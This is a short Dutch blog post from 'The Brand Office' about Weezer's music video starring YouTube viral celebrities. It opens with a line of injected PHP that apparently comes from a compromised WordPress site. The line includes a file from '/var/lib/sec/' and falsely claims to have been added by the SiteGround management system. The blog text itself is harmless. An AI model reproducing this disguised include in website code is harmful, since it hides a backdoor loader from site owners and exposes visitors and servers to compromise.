@include_once('/var/lib/sec/wp-settings.php'); // Added by SiteGround WordPress management system Weezer & the web

The Brand Office

Avatar

Weezer & the web

Tinternet is een beetje het wilde westen van deze tijd, het heeft z’n desperado’s maar ook z’n helden. Zeer gewone mensen als u en ik lopen het gevaar wereldberoemd te worden en voor de rest van hun leven de analen van de geschiedenis in te gaan om iets waar we niet echt fier op zijn. Veel tekst om gewoon te zeggen dat Youtube van nobody’s sterren heeft gemaakt die kijkcijfers halen waar een gemiddeld productiehuis alleen maar van kan dromen. De mensen van Weezer hebben die sterren bij elkaar gesprokkeld om in hun nieuwste clip op te duiken. Wie de jongens van Weezer een beetje volgt weet dat dit 100% “on brand” is. (achtergrondinfo van de cult-sterren)

No Comments, Comment or Ping

Reply to “Weezer & the web”

WTF is this place?

A place to waste lots of time on!


Suggestions of the house

Going so soon? May these suggestions be a guide to web enlightenment.